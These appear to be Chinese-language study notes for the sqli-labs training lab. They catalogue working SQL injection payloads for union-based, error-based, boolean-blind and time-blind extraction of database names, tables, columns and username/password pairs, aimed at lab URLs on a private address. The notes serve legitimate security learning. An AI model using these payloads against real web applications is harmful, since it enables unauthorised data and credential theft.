容器:
docker ps -a docker exec -it 容器名 /bin/bash cd /var/www/html/Less-1数据库:
mysql参考文献:https://blog.csdn.net/qq_40939688/article/details/104897480
sqli-labs 通用:
测试闭合语句:' ,'), ')) ," ,") ,")) 注释符号:--+、# 、--判断是否存在注入点 select * from users where user_id =‘1’ and 1=1 --+T select * from users where user_id =‘1’ and 1=2 --+ F
order by 对列排序
select * from users where user_id ='1' order by 3 --+T select * from users where user_id ='1' order by 4 --+Funion 联合查询
select * from users where user_id ='-1' union 1,2,3 --+ Tdatabase()函数显示当前数据库
select * from users where user_id ='-1' union 1,2,database() --+按limit数值,一次取一个数据库数据,
union 1,2,schema_name from information_schema.schemata limit 0,1使用group_concat()函数直接一条语句取出所有数据库
union 1,2,group_concat(schema_name) from information_schema.schemata --+取出security数据库所有表
union 1,2,group_concat(table_name ) from information_schema.tables where table_schema ='security' --+ #16进制转换:table_schema=0x7365637572697479取出users表中所有字段
union 1,2,group_concat(column_name ) from information_schema.columns where table_name = 'users' --+ #16进制转换:table_name=0x7573657273使用concat_ws()函数,取出security,users所有数据
union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+盲注: bool型盲注: 猜解数据库:(1)使用left()函数,建议配合burp
判断第一位:and left ((select database()),1) = 's' --+ 判断第二位:and left ((select database()),2) = 'se' --+ 数据库名字:and left ((select database()),8) = 'security'方法(2)二分法猜解
判断值域: and ascii(substr((select database()),1,1)) > 100 T and ascii(substr((select database()),1,1)) > 156 F 值域:ascii(100~156),然后继续二分法进行判断。数据库判断:
ascii(substr((select schema_name from information_schema.schemata limit 1,1),#1,1)) =99 --+ c ascii(substr((select schema_name from information_schema.schemata limit 1,1),2,1)) =104--+ ch 数据库为challenges数据表判断:
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1)) >114--+ r ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),2,1)) =101--+ re 数据库:security 表:referers数据字段判断:
and ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),1,1)) =117--+ u and ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),2,1)) =115--+ us 数据库:security 表:referers字段:username数据提取:
and ascii(substr((select username from security.users limit 1,1),1,1)) >65--+ A and ascii(substr((select username from security.users limit 1,1),2,1)) >110--+ An 数据库:security 表:referers字段:username 数据:Angelina双注入方法:使用套用模板
http://192.168.1.196/Less-5/?id=1'union select 1,count(*),concat((插入语句),floor(rand()*2)) as a from information_schema.columns group by a#显示当前库:
union select 1,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by a#显示表:
union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),floor(rand()*2)) as a from information_schema.columns group by a#显示列:
union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.columns group by a#显示内容:
http://192.168.1.196/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 1,1),floor(rand()*2)) as a from information_schema.columns group by a#判断数据库长度:
http://192.168.1.196/Less-8/?id=1' and LENGTH(database())>=7 --+时间盲注:
http://192.168.1.196/Less-10/?id=1" and if(ascii(substr(database(),1,1)) = 115, 0, sleep(2)) --+总结:先使用单双引号括号,进行闭合sql语句,使用and 1=1、1=2 或者 or 1=1、1=2判断是否有注入点和是否存在回显。 存在回显,使用报错查询语句查询,不存在回显,先判断页面是否提示返回成功和失败页面,页面返回页面是否固定;再选择是使用布尔盲注还是时间盲注, 查询语句尾部基本都插入注释语句,使用order by判断存在多少列,使用 union 联合查询,按照流程一步步走。
